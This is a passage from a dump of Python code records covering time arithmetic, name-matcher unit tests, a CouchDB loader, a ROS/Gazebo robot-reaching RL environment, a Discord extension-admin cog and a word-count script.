= self.sec - time2.sec\r\n\r\n while result.sec < 0 :\r\n result.min -= 1\r\n result.sec += 60\r\n \r\n while result.min < 0 :\r\n result.hour -= 1\r\n result.min += 60\r\n\r\n if result.hour < 0 :\r\n return 'This can not be calculated'\r\n \r\n else:\r\n return result\r\n\r\n def seconds_to_time(self):\r\n result = Time(0, 0, 0)\r\n result.sec = self.sec\r\n \r\n while result.sec >= 60:\r\n result.min += 1\r\n result.sec -= 60\r\n \r\n while result.min >= 60:\r\n result.hour += 1\r\n result.min -= 60\r\n\r\n return result\r\n\r\n def time_to_seconds(self):\r\n result = Time(0, 0, 0)\r\n result.sec = self.sec\r\n result.sec += self.min * 60\r\n result.sec += self.hour * 3600\r\n\r\n return result\r\n\r\n\r\n \r\n\r\ndef show_menu():\r\n print(\"1- Sum\\n2- Submission\\n3- Convert seconds to time\\n4- Convert time to seconds\\n5- Exit\")\r\n\r\ndef get_input():\r\n time_1 = input('Please enter first time (hh:mm:ss): ')\r\n time_1 = time_1.split(':')\r\n \r\n time_2 = input('Please enter second time (hh:mm:ss): ')\r\n time_2 = time_2.split(':')\r\n\r\n time1 = Time(int(time_1[0]), int(time_1[1]), int(time_1[2]))\r\n time2 = Time(int(time_2[0]), int(time_2[1]), int(time_2[2]))\r\n\r\n return time1 , time2\r\n\r\ndef get_sec():\r\n seconds = int(input('Please enter seconds: '))\r\n return Time(None, None, seconds)\r\n\r\ndef get_time():\r\n time = input('Please enter time (hh:mm:ss): ')\r\n time = time.split(':')\r\n return Time(int(time[0]), int(time[1]), int(time[2]))\r\n\r\n\r\nwhile True:\r\n show_menu()\r\n user_choice = int(input('Please choose an option: '))\r\n\r\n if user_choice == 1:\r\n time_1 , time_2 = get_input()\r\n time_1.SUM(time_2).show()\r\n\r\n elif user_choice == 2:\r\n time_1 , time_2 = get_input()\r\n try:\r\n time_1.Submission(time_2).show()\r\n except:\r\n print(time_1.Submission(time_2))\r\n\r\n elif user_choice == 3:\r\n sec = get_sec()\r\n sec.seconds_to_time().show()\r\n\r\n elif user_choice == 4:\r\n time = get_time()\r\n print(f\"Result is: {time.time_to_seconds().sec}\")\r\n\r\n elif user_choice == 5:\r\n break","sub_path":"2- Time (Object oriented).py","file_name":"2- Time (Object oriented).py","file_ext":"py","file_size_in_byte":3161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"283246882","text":"#!/usr/bin/python\n\nimport unittest\nfrom util import django_utils\n\nimport approximate_matcher\n\n\"\"\"\nThis test is probably useless now because \n1. It doesn't appear to connect to a DB. \n2. We are primarily using the haystack based search for matching.\nShould figure out how to mock haystack connections for testing.\n\"\"\"\n\nclass TestMatcher(unittest.TestCase):\n \"\"\"Tests for matcher.Matcher.\"\"\"\n \n test_names = ('avi',\n 'ari',\n 'ariel',\n 'glucose',\n 'glucosamine',\n 'alanine',\n 'phenylalanine',\n 'l-glucosamine',\n 'lactate dehydrogenase')\n \n def _CheckIsSortedByScore(self, results):\n prev_score = 10.0 # Scores are all <= 1.0\n for match in results:\n self.assertTrue(match.score <= prev_score)\n prev_score = match.score\n \n def _CheckAllNamesOnMatcher(self, names, matcher, max_results, min_score,\n check_sorted=True):\n for name in names: \n results = matcher.Match(name)\n self.assertTrue(len(results) <= max_results,\n msg='%d results but max_results=%d' % (len(results),\n max_results))\n if check_sorted:\n self._CheckIsSortedByScore(results)\n \n for result in results:\n self.assertTrue(result.score >= min_score)\n \n def testEditDistanceMatcher(self): \n for max_results in (1, 5, 10):\n for min_score in (0.0, 0.3, 0.7):\n m = approximate_matcher.EditDistanceMatcher(\n max_results=max_results, min_score=min_score)\n self._CheckAllNamesOnMatcher(\n self.test_names, m, max_results, min_score)\n \n\n def testPrepareExpression(self):\n m = approximate_matcher.RegexApproxMatcher({})\n examples = ((' teSt tEsT ', '.*test[-+,[:digit:][:blank:]]+test.*'),\n ('gluco', '.*gluco.*'),\n ('D Fructo', '.*d[-+,[:digit:][:blank:]]+fructo.*'),\n ('aspartyl-phosphate', '.*aspartyl[-+,[:digit:][:blank:]]+phosphate.*'))\n for query, expression in examples:\n self.assertEqual(expression, m._PrepareExpression(query))\n\n def testRegexApproxMatcher(self):\n for max_results in (1, 5, 10):\n for min_score in (0.0, 0.3, 0.7):\n m = approximate_matcher.RegexApproxMatcher(\n max_results=max_results, min_score=min_score)\n self._CheckAllNamesOnMatcher(\n self.test_names, m, max_results, min_score)\n \n def testCascadingMatcher(self):\n for max_results in (1, 5, 10):\n for min_score in (0.0, 0.3, 0.7):\n m = approximate_matcher.CascadingMatcher(\n max_results=max_results, min_score=min_score)\n \n # We don't check if things are sorted on the cascading \n # matcher because it doesn't sort across the results\n # of it's sub-matchers.\n self._CheckAllNamesOnMatcher(\n self.test_names, m, max_results, min_score,\n check_sorted=False)\n\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"matching/approximate_matcher_test.py","file_name":"approximate_matcher_test.py","file_ext":"py","file_size_in_byte":3411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"377464485","text":"import sys\nsys.path.append(\"../../../../\")\nfrom tests.utils.cmd_args import args\nfrom tests.utils.logger import log\nsys.path.append(\"../../\")\nimport hive_utils\n\n\ndef start_node(**kwargs):\n node=None\n if args.hive_path:\n log.info(\"Running hived via {} in {} with config {}\".format(args.hive_path, \n args.hive_working_dir, \n args.hive_config_path)\n )\n \n node = hive_utils.hive_node.HiveNodeInScreen(\n args.hive_path, \n args.hive_working_dir, \n args.hive_config_path, **kwargs\n )\n node.run_hive_node([\"--enable-stale-production\"])\n return node","sub_path":"tests/functional/python_tests/cli_wallet/tests/utils/node_util.py","file_name":"node_util.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"199972236","text":"import time\nimport couchdb\nimport json\nimport base64\nimport sys\n\ncouch = couchdb.Server()\n\ndb = couch['tienda']\t\n\ndef GetCategoria(pNombre):\n\tdb = couch['tienda']\n\tmap_fun = \"function(doc) { if(doc.tipo == 'categoria' && doc.nombre == '%s') emit(doc._id, doc);}\" % (pNombre)\n\treturn db.query(map_fun)\ndef GetVendedor(pNombre,pApellido):\n\tdb = couch['tienda']\n\tmap_fun = \"function(doc) { if(doc.tipo == 'vendedor' && doc.nombre == '%s' && doc.apellido == '%s') emit(doc._id, doc);}\" % (pNombre ,pApellido)\n\treturn db.query(map_fun)\ndef CodificarImagen():\n\tencoded_string = None\n\ttry:\n\t\twith open(\"prueba.jpg\") as image_file:\n\t\t\tencoded_string = base64.b64encode(image_file.read())\n\texcept IOError as e:\n\t\tmensajeError = \"Se presento un problema en la codificacion({0}): {1}\".format(e.errno, e.strerror)\n\t\ttime.sleep(2)\n\t\tencoded_string = None\n\treturn encoded_string\ndef imgBase64(pRuta):\n\tencoded_string = None\n\twith open(\"imagenes/\"+pRuta, \"rb\") as image_file:\n\t\tencoded_string = base64.b64encode(image_file.read())\n\treturn encoded_string\n\ndef scriptInserciones(pRuta):\n\twith open(pRuta) as data_file: \n\t\tdata = json.load(data_file)\n\t\tfor vendedor in data[\"informacion\"]:\n\t\t\tdb = couch['tienda']\n\t\t\t\n\t\t\tmNuevoVendedor = GetVendedor(vendedor[\"nombre\"], vendedor[\"apellido\"])\n\t\t\tif (len(mNuevoVendedor)==0):\n\t\t\t\tmNuevoVendedor = {'tipo': 'vendedor','nombre':vendedor[\"nombre\"], \"apellido\":vendedor[\"apellido\"]}\n\t\t\t\tdb.save(mNuevoVendedor)\n\t\t\telse:\n\t\t\t\tmNuevoVendedor = list(mNuevoVendedor)[0][\"value\"]\n\t\t\t\n\t\t\tfor articulo in vendedor[\"articulos\"]:\n\t\t\t\t\n\t\t\t\tmCategoria = GetCategoria(articulo[\"categoria\"])\n\t\t\t\tif (len(mCategoria) == 0):\n\t\t\t\t\tmCategoria = {'tipo': 'categoria','nombre':articulo[\"categoria\"],\"consulta_num\":0, \"articulos\":[]}\n\t\t\t\t\tdb.save(mCategoria)\n\t\t\t\telse:\n\t\t\t\t\tmCategoria = list(mCategoria)[0][\"value\"]\n\t\t\t\t\n\t\t\t\tmNuevoArticulo = {\"tipo\":\"articulo\",\"nombre\":articulo[\"nombre\"],\"descripcion\":articulo[\"descripcion\"], \"consulta_num\":0, \"vendedor_id\":mNuevoVendedor[\"_id\"], \"foto\": imgBase64(articulo[\"foto\"])}\t\n\t\t\t\tdb.save(mNuevoArticulo)\n\t\t\t\tmCategoria[\"articulos\"].append(mNuevoArticulo['_id'])\n\t\t\t\tdb.save(mCategoria)\n\nCodificarImagen()\n#scriptInserciones('datos.json')\n","sub_path":"CodigoFuente/templates/Sin utilizar/ScriptInsercion.py","file_name":"ScriptInsercion.py","file_ext":"py","file_size_in_byte":2191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"430281665","text":"# python related packages\nimport time\nimport numpy as np\nfrom numpy.linalg import inv, norm\n\nfrom threading import Timer, Lock\nfrom gym import error, spaces, utils\nfrom . import ros_general_utils as ros_utils # custom user defined ros utils\nfrom numpy.linalg import inv, norm\nfrom gym_gazebo_ros.envs.tiago_robot.tiago_v0 import TiagoEnv\n\n# ros related data structure\nfrom geometry_msgs.msg import Twist, WrenchStamped, Pose, PoseStamped\n# Used for publishing UR joint angles.\nfrom trajectory_msgs.msg import JointTrajectory, JointTrajectoryPoint\nfrom control_msgs.msg import * # control with action interface\nfrom sensor_msgs.msg import LaserScan, JointState\n\n\n# ros related function packages\nimport rospy\nimport transforms3d as tf3d\nfrom gazebo_msgs.msg import ModelState, ContactState, ContactsState\nfrom play_motion_msgs.msg import PlayMotionAction, PlayMotionGoal\n\n# numpy array output format\nnp.set_printoptions(precision=3, suppress=True)\n\"\"\"\nReach task version V0:\nReach a target with a specific orientation\nobervation space: hand pose and relative pose\n\"\"\"\n\n\nclass TiagoReachV0(TiagoEnv):\n def __init__(self):\n super(TiagoReachV0, self).__init__()\n\n # resolve for action space and observation space\n self.hand_joint_names = [\n 'hand_thumb_joint',\n 'hand_index_joint',\n 'hand_mrl_joint']\n self.ctrl_joint_names = []\n self.__joint_pos_lower = []\n self.__joint_pos_upper = []\n self.__joint_vel_upper = []\n self.__joint_vel_lower = []\n self.__joint_force_limits = []\n\n for i, joint in enumerate(self.robot.joints):\n # choose joint groups, e.g. arm, hand, torso and so on\n # TODO: control more groups in future work. this demo just consider\n # arm group\n if joint.joint_type != 'fixed' and (\n joint.name.startswith('arm') is True): # skip hand related joints\n self.ctrl_joint_names.append(joint.name)\n self.__joint_pos_lower.append(\n joint.limit.lower) if joint.limit.lower is not None else self.__joint_pos_lower.append(-np.inf)\n self.__joint_pos_upper.append(\n joint.limit.upper) if joint.limit.upper is not None else self.__joint_pos_upper.append(\n np.inf)\n self.__joint_vel_lower.append(-joint.limit.velocity)\n self.__joint_vel_upper.append(joint.limit.velocity)\n self.__joint_force_limits.append(joint.limit.effort)\n\n print(\n \"joints controlled in this task: {}\".format(\n self.ctrl_joint_names))\n\n # TODO: change the corresponding items according to your task\n # position, action is incremental postion command\n self.action_lower = np.array(\n self.__joint_vel_lower) * self.control_period * .5\n self.action_upper = np.array(\n self.__joint_vel_upper) * self.control_period * .5\n self.action_space = spaces.Box(self.action_lower, self.action_upper)\n\n # (state)observation space: task oriented configuration\n # for this pick and place task states include robot end effector pose, relative pose to target\n # default setting: velocity and force info. is disabled\n\n self.ee_pose_lower = [-np.inf] * 3 + [-1] * 4\n self.ee_pose_upper = [np.inf] * 3 + [-1] * 4\n # position [x,y,z] and quanternion (w,x,y,z)\n self.ee_relative_pose_lower = [-np.inf] * 3 + [-1] * 4\n self.ee_relative_pose_upper = [np.inf] * 3 + [1] * 4\n\n if self.robot_name == 'titanium':\n # include force info. if titanium is used\n self.ft_lower = [-np.inf] * 6\n self.ft_upper = [np.inf] * 6\n else:\n self.ft_lower = []\n self.ft_upper = []\n\n # self.low_full_state = self.ee_relative_pose_lower\n # self.high_full_state = self.ee_relative_pose_upper\n # end effector pos, vec and force.\n self.low_full_state = np.concatenate(\n (self.ee_pose_lower, self.ee_relative_pose_lower))\n self.high_full_state = np.concatenate(\n (self.ee_pose_upper, self.ee_relative_pose_upper))\n self.observation_space = spaces.Box(\n np.array(\n self.low_full_state), np.array(\n self.high_full_state))\n\n # Initialize a target pose for reaching task\n self.ee_target_pose, target_pose = self.spawn_dynamic_reaching_goal(\n 'ball')\n self.goal = target_pose # target pose, data type: geometry_msgs.msg.Pose\n\n # define the number of time step for every step know the time, then it can compute something\n # depend on the time\n self.contact_flag_released = True\n self.contact_flag = False\n self.tolerance = 1e-2 # reaching error threshold\n self.control_period = 0.01\n print(\"finish setup tiago reaching V0 task env.\")\n\n def _step(self, action):\n \"\"\"\n Interact with env with policy learning with RL agent\n action: depend on the action space setting\n Return: state, reward, and done status in this function\n The action command comes from an agent, which is an algorithm used for making decision\n \"\"\"\n # Clip by veloctiy\n print(\"raw action: {}\".format(action))\n # should we used incremental command for a?\n act_clip, curr_goal = self._action_clip(action)\n\n if (action != act_clip).any():\n print(\"cliped action: {}\".format(act_clip))\n print(\"current joint config.: {}\".format(np.array(self.joint_pos)))\n print(\"desired joint config.: {}\".format(np.array(curr_goal)))\n\n rospy.wait_for_service('/gazebo/unpause_physics')\n try:\n self.unpause_physics()\n except (rospy.ServiceException) as e:\n print(\"/gazebo/unpause_physics service call failed\")\n\n try:\n # TODO: actually our action should consider the robot joint limit (including velocity limit)\n # TODO: add action prediction and corresponding terminate condition prediction before take excution\n # TODO: limit action (position translocation), keep every step have a very small moving.\n # we use joint position increment to send to robot\n\n # Control with action client\n self.arm_pos_control_client.wait_for_server()\n rospy.loginfo('connected to robot arm controller server')\n\n g = FollowJointTrajectoryGoal()\n g.trajectory = JointTrajectory()\n g.trajectory.joint_names = self.ctrl_joint_names\n g.trajectory.points = [\n JointTrajectoryPoint(\n positions=curr_goal,\n velocities=[0] * len(action),\n time_from_start=rospy.Duration(\n self.control_period))]\n self.arm_pos_control_client.send_goal(g)\n rospy.loginfo('send position to robot arm')\n\n # bug? wait for result blocking!\n # self.arm_pos_control_client.wait_for_result()\n time.sleep(self.control_period)\n rospy.loginfo('Execute velocity control for one step')\n result = self.arm_pos_control_client.get_state()\n rospy.loginfo(\n 'task done with state: ' +\n self._get_states_string(result))\n except KeyboardInterrupt:\n self.arm_pos_control_client.cancel_goal()\n\n # get joint data.\n ee_pose, ee_rel_pose, joint_pos, joint_vel = self._get_obs()\n obs_ = ee_pose + ee_rel_pose # next state\n done = self.is_task_done(obs_, joint_vel) # done flag\n reward = self.get_reward(obs_) # reward\n print(\"=================episode: %d, step: %d, reward : %.3f\"\n % (self.current_epi, self.time_step_index, reward))\n\n # (needed by gym) we should return the state(or observation from state(function of state)), reward, and done status.\n # If the task completed, such as distance to target is d > = 0.001,\n # then return done= True, else return done = False. done depend on the terminal conditions partly.\n # NOTE: `reward` always depend on done and action, or state, so it\n # always calculated finally.\n self.joint_pos = joint_pos # update joint state\n self.time_step_index += 1\n return np.array(obs_), reward, done, {}\n\n def get_reward(self, obs):\n \"\"\"\n retrieve reward\n :param obs: current state, include the distance to target and the end effector postion\n :return:\n \"\"\"\n rel_pose = obs[7:]\n dist_trans = norm(rel_pose[:3])\n dist_rot = ros_utils.distance_of_quaternion(rel_pose[3:])\n # tuning is needed\n dist = 0.5 * np.exp(-2 * dist_trans) + 0.5 * np.exp(- dist_rot / np.pi)\n return dist\n\n def _action_clip(self, action):\n \"\"\"\n If action is beyond the current reaching goal, clip the action with the max velocity constraints\n :param action: original action value\n :return: clipped action value\n \"\"\"\n # velocity clip\n action = np.array(action)\n act_clip = action\n if np.any(\n action >= self.action_upper) or np.any(\n action <= self.action_lower):\n print(\"velocity bound clip\")\n act_clip = np.clip(action, self.action_lower, self.action_upper)\n\n # position clip\n curr_joint_pos = np.array(self.joint_pos)\n curr_goal = act_clip + curr_joint_pos\n if np.any(\n curr_goal >= self.__joint_pos_upper) or np.any(\n curr_goal <= self.__joint_pos_lower):\n print(\"joint bound clip\")\n curr_goal = np.clip(\n curr_goal,\n self.__joint_pos_lower,\n self.__joint_pos_upper).tolist()\n # actually used clipped action, we should use this info. to update\n # our policy\n act_clip = curr_goal - curr_joint_pos\n return act_clip, curr_goal\n\n def _get_obs(self):\n \"\"\"\n Return the current observation of the robot and env. e.g. end effector pos, target object\n pose, environment objects state, images state\n :return:\n \"\"\"\n joint_data = None\n while joint_data is None:\n rospy.loginfo('try to receive robot joint states...')\n # joint state topic return sensor_msgs/joint_state msg with member\n # pos, vec and effort\n joint_data = rospy.wait_for_message(\n '/joint_states', JointState, timeout=5)\n\n # get joint position and velocity\n idx = [\n i for i, x in enumerate(\n joint_data.name) if x in self.ctrl_joint_names]\n joint_pos = [joint_data.position[i] for i in idx]\n joint_vel = [joint_data.velocity[i] for i in idx]\n print(\"current joint config.: {}\".format(np.array(joint_pos)))\n\n assert ((np.array(joint_pos) <= np.array(self.__joint_pos_upper) +\n 0.009).all() and (np.array(joint_pos) >= np.array(self.__joint_pos_lower) -\n 0.009).all()), 'Illeagal joint state value'\n # get end-effector position and distance to target and end-effector velocity\n # end_pose_vel is end effector pose and velocity,\n # ee_absolute_translation is absolute position\n ee_pose, ee_rel_pose = self.get_ee_state()\n\n # get wrist force sensor data if titanium robot is used\n if self.robot_name == 'titanium':\n force_data_msg = None\n while force_data_msg is None:\n rospy.loginfo('try to receive force sensor data...')\n force_data_msg = rospy.wait_for_message(\n '/wrist_ft', WrenchStamped, timeout=5)\n\n force_data = [\n force_data_msg.wrench.force.x,\n force_data_msg.wrench.force.y,\n force_data_msg.wrench.force.z,\n force_data_msg.wrench.torque.x,\n force_data_msg.wrench.torque.y,\n force_data_msg.wrench.torque.z]\n print('==================your force data is: {}'.format(force_data))\n else:\n force_data = []\n\n return ee_pose, ee_rel_pose, joint_pos, joint_vel\n\n def get_ee_state(self):\n \"\"\"\n Compute distance between end effector and its absolute position\n :return:\n \"\"\"\n rospy.wait_for_service('/gazebo/get_link_state')\n\n if self.robot_name == 'steel':\n # print('End effector is a gripper...')\n try:\n end_state = self.get_link_pose_srv.call(\n 'tiago_steel::arm_7_link', \"world\").link_state\n except (rospy.ServiceException) as exc:\n print(\"/gazebo/get_link_state service call failed:\" + str(exc))\n else:\n # print('End effector is a 5 finger hand....')\n try:\n end_state = self.get_link_pose_srv.call(\n 'tiago_titanium::hand_mrl_link', \"world\").link_state\n except (rospy.ServiceException) as exc:\n print(\"/gazebo/get_link_state service call failed:\" + str(exc))\n\n end_pose_msg = end_state.pose\n ee_vel_msg = end_state.twist\n\n ###### start to extract the msg to data ######\n\n # translate the pose msg type to numpy.ndarray\n q = [\n end_pose_msg.orientation.w,\n end_pose_msg.orientation.x,\n end_pose_msg.orientation.y,\n end_pose_msg.orientation.z]\n Rotation = tf3d.quaternions.quat2mat(q)\n Translation = [\n end_pose_msg.position.x,\n end_pose_msg.position.y,\n end_pose_msg.position.z]\n end_pose_affine = tf3d.affines.compose(\n Translation, Rotation, np.ones(3))\n\n # transform form tool frame to grasp frame\n if self.robot_name == 'steel':\n r1 = tf3d.quaternions.quat2mat([-0.5, 0.5, 0.5, 0.5])\n trans1 = [0, 0, 0.046]\n arm_tool_affine = tf3d.affines.compose(trans1, r1, np.ones(3))\n arm_tool_pose = np.dot(end_pose_affine, arm_tool_affine)\n\n r2 = tf3d.quaternions.quat2mat(\n [5.19362e-12, 0.707107, 1.7312e-12, -0.707107])\n trans2 = [0.01, 0, 0]\n gripper_link_affine = tf3d.affines.compose(trans2, r2, np.ones(3))\n gripper_pose = np.dot(arm_tool_pose, gripper_link_affine)\n\n r3 = tf3d.quaternions.quat2mat([0.5, -0.5, 0.5, 0.5])\n trans3 = [0, 0, -0.12]\n grasp_link_affine = tf3d.affines.compose(trans3, r3, np.ones(3))\n end_pose_affine = np.dot(gripper_pose, grasp_link_affine)\n else:\n r = tf3d.quaternions.quat2mat([1, 0, 0, 0])\n trans = [0.13, 0.02, 0]\n grasp_link_affine = tf3d.affines.compose(trans, r, np.ones(3))\n end_pose_affine = np.dot(end_pose_affine, grasp_link_affine)\n\n ee_abs_pos = end_pose_affine[:3, 3].reshape(-1).tolist()\n ee_quat = tf3d.quaternions.mat2quat(end_pose_affine[:3, :3]).tolist()\n ee_pose = ee_abs_pos + ee_quat\n\n # compute the relative pose to target pose (target frame relative the\n # current frame)\n ee_rel_affine = np.dot(inv(end_pose_affine), self.ee_target_pose)\n dist_trans = ee_rel_affine[:3, 3].reshape(-1).tolist()\n dist_quat = tf3d.quaternions.mat2quat(ee_rel_affine[:3, :3]).tolist()\n ee_rel_pose = dist_trans + dist_quat\n\n # form the end-effector twist list\n ee_velocity = [\n ee_vel_msg.linear.x,\n ee_vel_msg.linear.y,\n ee_vel_msg.linear.z,\n ee_vel_msg.angular.x,\n ee_vel_msg.angular.y,\n ee_vel_msg.angular.z]\n\n return ee_pose, ee_rel_pose\n\n def _reset(self, random=False):\n # we should stop our controllers firstly or send the initial joint angles to robot\n # using joint trajectory controller. Or the robot will back to its\n # current position after unpause the simulation\n\n # reset arm position\n print(\"\\n=====================================================================================================\")\n rospy.loginfo('reset environment...')\n\n # reset robot first stage\n self.reset_world()\n self.ee_target_pose, self.goal = self.spawn_dynamic_reaching_goal(\n 'ball', random)\n self._virtual_reset_arm_config()\n\n # self._reset_hand_pose() # no hand, so deprecated\n time.sleep(0.2)\n\n print('===========================================reset done===============================================\\n')\n\n # read data to observation\n\n # update `state`\n # state = self.discretize_observation(data, 5)\n ee_pose, ee_rel_pose, joint_pos, joint_vel = self._get_obs()\n self.joint_pos = joint_pos\n state = ee_pose + ee_rel_pose\n self.current_epi += 1\n return np.array(state)\n\n def spawn_dynamic_reaching_goal(self, model_name, random=False):\n \"\"\"\n spawn an object in Gazebo and return its pose to robot\n :return:\n \"\"\"\n # stop simulation\n rospy.wait_for_service('/gazebo/unpause_physics')\n try:\n self.unpause_physics()\n except (rospy.ServiceException) as exc:\n print(\"/gazebo/unpause_physics service call failed:\" + str(exc))\n\n x = 0.7\n y = -0.1\n z = 1\n modelState = ModelState()\n modelState.model_name = model_name\n modelState.pose.orientation.x = 0\n modelState.pose.orientation.y = 0\n modelState.pose.orientation.z = 0\n modelState.pose.orientation.w = 1\n modelState.reference_frame = 'world'\n\n if random:\n modelState.pose.position.x = x + np.random.sample() * 0.4 - 0.2\n modelState.pose.position.y = y\n modelState.pose.position.z = z + np.random.sample() * 0.4 - 0.2\n else:\n modelState.pose.position.x = x\n modelState.pose.position.y = y\n modelState.pose.position.z = z\n\n self.set_model_state(modelState)\n\n Rotation = tf3d.quaternions.quat2mat(\n [\n modelState.pose.orientation.w,\n modelState.pose.orientation.x,\n modelState.pose.orientation.y,\n modelState.pose.orientation.z])\n Translation = [\n modelState.pose.position.x,\n modelState.pose.position.y,\n modelState.pose.position.z]\n target_pose = tf3d.affines.compose(Translation, Rotation, np.ones(3))\n\n # the hand pose is relative to the target\n hand2ball_trans = [-0.04, 0, 0]\n hand2ball_rot = tf3d.euler.euler2mat(0, 0, 0)\n hand2ball_affine = tf3d.affines.compose(\n hand2ball_trans, hand2ball_rot, np.ones(3))\n # T(hand2world) = T(ball2world) * T(hand2ball)\n hand_pose_mat = np.dot(target_pose, hand2ball_affine)\n hand_translation = hand_pose_mat[:3, 3].reshape(-1)\n hand_quat = tf3d.quaternions.mat2quat(\n hand_pose_mat[:3, :3]) # quaternion [w, x, y, z]\n\n hand_pos = Pose()\n hand_pos.position.x = hand_translation[0]\n hand_pos.position.y = hand_translation[1]\n hand_pos.position.z = hand_translation[2]\n hand_pos.orientation.w = hand_quat[0]\n hand_pos.orientation.x = hand_quat[1]\n hand_pos.orientation.y = hand_quat[2]\n hand_pos.orientation.z = hand_quat[3]\n\n # hand_pose = modelState.pose # different from the target pose\n # hand_pose.position.x = x - 0.1\n return hand_pose_mat, hand_pos\n\n def is_task_done(self, state, joint_vel):\n\n self.lock.acquire()\n contact_flag = self.contact_flag\n self.lock.release()\n\n # extract end position distance from state\n obs = state[7:]\n dist = norm(np.array(obs[:3]))\n dist_ori = ros_utils.distance_of_quaternion(obs[3:]) # [0, 3.14]\n\n # TODO: add collision detection to cancel wrong/bad/negative trial!\n # TODO: add end-effector force sensor data to terminate the trial\n\n # if np.any(np.greater(np.fabs(joint_vel), self.__joint_vel_upper)):\n # print('DONE, robot joint velocity exceed the joint velocity limit')\n # return True\n\n if dist >= 0.7:\n print(\"DONE, too far away from the target\")\n return True\n elif dist_ori >= 1.57:\n print(\"DONE, wrong direction\")\n return True\n elif contact_flag:\n print(\"DONE, collision with objects\")\n self.contact_flag = False\n return True\n elif dist <= self.tolerance and dist_ori <= 0.2:\n print(\"DONE, task succeed\")\n return True\n else:\n return False\n","sub_path":"gym_gazebo_ros/envs/tiago_robot/tiago_reach_v0.py","file_name":"tiago_reach_v0.py","file_ext":"py","file_size_in_byte":20984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"351547569","text":"import os\nfrom pathlib import Path\nfrom typing import List\nfrom discord.ext import commands\nfrom discord.ext.commands import ExtensionNotFound, ExtensionAlreadyLoaded, ExtensionNotLoaded, NoEntryPointError, ExtensionFailed\n\nclass ExtensionAdmin(commands.Cog):\n \"\"\" Extension Admin Commands \"\"\"\n\n def __init__(self, bot):\n self.bot = bot\n\n def extension_path(self, ext: str) -> Path:\n path = Path(self.bot.data_path, 'extensions', ext)\n path = path.relative_to(Path('.').resolve())\n return path\n\n def extension_import(self, ext: str) -> str:\n path = self.extension_path(ext)\n return str(path).replace('/','.')\n\n def loaded_extensions(self) -> List[str]:\n prefix = self.extension_import('') + \".\"\n return [f.replace(prefix,'') for f in self.bot.extensions]\n\n def available_extensions(self) -> List[str]:\n exts = []\n prefix = self.extension_import('') + \".\"\n loaded_extensions = self.loaded_extensions()\n for child in self.extension_path('').iterdir():\n if str(child) in self.bot.config.extension_filters:\n continue\n if child.is_dir():\n if child.joinpath('__init__.py').exists():\n ext_module = str(child).replace('/','.').replace(prefix,'')\n if ext_module not in loaded_extensions:\n exts.append(ext_module)\n return exts\n\n @commands.command()\n @commands.is_owner()\n async def load(self, ctx, *, extension : str):\n e = self.extension_import(extension)\n try:\n self.bot.load_extension(e)\n if e not in self.bot.config.extensions:\n self.bot.config.extensions.append(e)\n self.bot.config.save()\n await ctx.message.channel.send('Extension loaded: {}'.format(extension))\n except ExtensionNotFound:\n await ctx.message.channel.send('Extension not found: {}'.format(extension))\n except ExtensionAlreadyLoaded:\n await ctx.message.channel.send('Extension already loaded: {}'.format(extension))\n except NoEntryPointError:\n await ctx.message.channel.send('Exension has no setup function: {}'.format(extension))\n except ExtensionFailed as e:\n await ctx.message.channel.send('Extension failed: {}, {}'.format(extension, e))\n raise e\n\n @commands.command()\n @commands.is_owner()\n async def unload(self, ctx, *, extension : str):\n e = self.extension_import(extension)\n try:\n self.bot.unload_extension(e)\n await ctx.message.channel.send('Extension unloaded: {}'.format(extension))\n except ExtensionNotLoaded:\n await ctx.message.channel.send('Extension not loaded: {}'.format(extension))\n if e in self.bot.config.extensions:\n self.bot.config.extensions.remove(e)\n self.bot.config.save()\n\n @commands.command()\n @commands.is_owner()\n async def reload(self, ctx, *, extension : str):\n e = self.extension_import(extension)\n try:\n self.bot.reload_extension(e)\n await ctx.message.channel.send('Extension reloaded: {}'.format(extension))\n except ExtensionNotLoaded:\n await ctx.message.channel.send('Extension not loaded: {}'.format(extension))\n except ExtensionNotFound:\n await ctx.message.channel.send('Extension not found: {}'.format(extension))\n except NoEntryPointError:\n await ctx.message.channel.send('Exension has no setup function: {}'.format(extension))\n except ExtensionFailed as e:\n await ctx.message.channel.send('Extension failed: {}, {}'.format(extension, e))\n\n @commands.command()\n @commands.is_owner()\n async def available(self, ctx):\n channel = ctx.message.channel\n exts = None\n with channel.typing():\n exts = [\"- {}\".format(e) for e in self.available_extensions()]\n if exts:\n exts.sort()\n await channel.send('Extensions:\\n```{}```'.format(\"\\n\".join(exts)))\n else:\n await channel.send('No extensions found')\n\n @commands.command()\n @commands.is_owner()\n async def loaded(self, ctx):\n channel = ctx.message.channel\n exts = None\n await channel.send('Prefix: {}'.format(self.extension_import('')))\n with channel.typing():\n exts = [\"- {}\".format(e) for e in self.loaded_extensions()]\n if exts:\n exts.sort()\n await channel.send('Extensions:\\n```{}```'.format(\"\\n\".join(exts)))\n else:\n await channel.send('No extensions found')\n\n\n","sub_path":"extensions/admin_extension/bot_admin.py","file_name":"bot_admin.py","file_ext":"py","file_size_in_byte":4689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"311040034","text":"#text stats test\n\"\"\"文本统计程序\n\"\"\"\nfrom time import clock #使用time库中的clock函数来计时\n\nkeep_chr = \"qwertyuiopasdfghjklzxcvbnm -'\"\nkeep = {''} #如果不加上''的话会默认keep为字典而非集合\nfor c in keep_chr:\n keep.add(c)\nkeep.remove('')\n\ndef normalize(s):\n \"\"\"标准化字符串\n \"\"\"\n result = ''\n for c in s.lower():\n if c in keep:\n result += c\n return result\n\ndef textstats(s):\n \"\"\"字符统计函数,返回字典\n \"\"\"\n s= normalize(s)\n words = s.split()\n counts = {}#空字典,用来存储\n for w in words:\n counts[w] = counts.get(w, 0) + 1\n #get的使用方法:查找w的值,找到则返回值,找不到则返回指定值\n return counts\n\ndef get_top(dict):\n \"\"\"输入一个字典,对字典中的值进行排序,并返回列表\n \"\"\" \n lst = []\n for k in dict:\n part = (dict[k], k)\n lst.append(part)\n lst.sort()\n lst.reverse()\n return 